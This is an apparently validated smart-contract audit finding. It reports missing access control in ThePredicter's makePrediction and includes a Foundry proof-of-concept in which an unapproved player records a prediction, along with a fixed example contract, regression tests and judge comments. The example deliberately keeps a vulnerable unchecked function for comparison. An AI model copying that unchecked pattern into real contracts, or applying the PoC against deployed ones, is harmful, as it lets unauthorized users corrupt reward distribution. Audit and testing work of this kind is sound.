Submission Details
Severity: high
Valid

Anyone can make a prediction

Details

Only players that the organizer has approved are expected to be able to call ThePredicter::makePrediction. The function, however, never checks the caller's status, so any address, approved or not, can call it and record a prediction. The PoC below uses a player that registered but was never approved.

POC

+ address public stranger2 = makeAddr("stranger2");   // added to the test contract's state
function test_anyoneCanMakePrediction() public {
    // stranger2 registers (pays the entrance fee) but is never approved
    vm.startPrank(stranger2);
    vm.warp(1);
    vm.deal(stranger2, 1 ether);
    thePredicter.register{value: 0.04 ether}();
    vm.stopPrank();

    // the organizer approves a different player (stranger); stranger2 stays unapproved
    vm.startPrank(organizer);
    vm.warp(2);
    thePredicter.approvePlayer(stranger);
    vm.stopPrank();

    // the unapproved stranger2 can still submit a prediction: the call does not revert
    vm.startPrank(stranger2);
    thePredicter.makePrediction{value: 0.0001 ether}(
        0,
        ScoreBoard.Result.Draw
    );
    vm.stopPrank();
}

Impact

Unapproved addresses can pay the prediction fee and have their predictions recorded, so the score calculation and reward distribution are computed over predictions that should never have been accepted. Users who were never approved but still pay the fee to enter the function also lose those funds.

Tools Used

Manual Review

Recommendations

Add a check at the top of makePrediction that reverts unless the caller's status is Status.Approved (the status that approvePlayer grants), for example through an onlyApproved modifier, so that only approved players can pay the fee and record a prediction.
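The shape of that fix, together with a Foundry test that proves the unapproved player is now rejected while an approved one still gets through, as an added example that is not ThePredicter's own code. The Status enum, the playersStatus mapping, the predictions mapping, the error names and the ScoreBoard.Result values are assumptions modelled on the names used in this report; the real contract may differ.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Assumed stand-in for the project's ScoreBoard.Result enum.
library ScoreBoard {
    enum Result { Pending, First, Draw, Second }
}

// Minimal model of the vulnerable and the fixed function side by side.
// Names below (Status, playersStatus, predictions, errors) are assumptions.
contract PredicterAccessControlExample {
    enum Status { Unknown, Pending, Approved, Canceled }

    error NotApproved(address caller);
    error IncorrectFee();
    error OnlyOrganizer();

    address public immutable organizer;
    uint256 public constant entranceFee = 0.04 ether;
    uint256 public constant predictionFee = 0.0001 ether;

    mapping(address => Status) public playersStatus;
    mapping(address => mapping(uint256 => ScoreBoard.Result)) public predictions;

    constructor() {
        organizer = msg.sender;
    }

    function register() external payable {
        if (msg.value != entranceFee) revert IncorrectFee();
        playersStatus[msg.sender] = Status.Pending;
    }

    function approvePlayer(address player) external {
        if (msg.sender != organizer) revert OnlyOrganizer();
        playersStatus[player] = Status.Approved;
    }

    // Vulnerable shape: the fee is checked, the caller's status is not.
    function makePredictionUnchecked(uint256 matchNumber, ScoreBoard.Result prediction) external payable {
        if (msg.value != predictionFee) revert IncorrectFee();
        predictions[msg.sender][matchNumber] = prediction;
    }

    // Fix: revert unless the caller holds the status approvePlayer grants.
    modifier onlyApproved() {
        if (playersStatus[msg.sender] != Status.Approved) revert NotApproved(msg.sender);
        _;
    }

    function makePrediction(uint256 matchNumber, ScoreBoard.Result prediction) external payable onlyApproved {
        if (msg.value != predictionFee) revert IncorrectFee();
        predictions[msg.sender][matchNumber] = prediction;
    }
}

contract PredicterAccessControlTest is Test {
    PredicterAccessControlExample predicter;
    address organizer = makeAddr("organizer");
    address stranger = makeAddr("stranger");
    address stranger2 = makeAddr("stranger2");

    function setUp() public {
        vm.prank(organizer);
        predicter = new PredicterAccessControlExample();
        vm.deal(stranger, 1 ether);
        vm.deal(stranger2, 1 ether);
        vm.prank(stranger);
        predicter.register{value: 0.04 ether}();
        vm.prank(stranger2);
        predicter.register{value: 0.04 ether}();
        // only stranger is approved; stranger2 stays Pending, as in the PoC above
        vm.prank(organizer);
        predicter.approvePlayer(stranger);
    }

    function test_unapprovedPlayerIsRejected() public {
        vm.prank(stranger2);
        vm.expectRevert(abi.encodeWithSelector(PredicterAccessControlExample.NotApproved.selector, stranger2));
        predicter.makePrediction{value: 0.0001 ether}(0, ScoreBoard.Result.Draw);
    }

    function test_approvedPlayerCanPredict() public {
        vm.prank(stranger);
        predicter.makePrediction{value: 0.0001 ether}(0, ScoreBoard.Result.Draw);
        assertEq(uint256(predicter.predictions(stranger, 0)), uint256(ScoreBoard.Result.Draw));
    }
}
```

The unchecked variant is kept only to show the missing line; in the real fix the original makePrediction gets the modifier and no unchecked entry point remains. The expectRevert assertion is the regression test worth keeping in the suite: the original PoC passes both before and after the fix, since it asserts nothing, whereas this one fails if the status check is ever removed.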

Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

makePrediction lacks access control

makePrediction has no access controls and any unapproved user can make predictions causing an incorrect calculation and distribution of rewards.
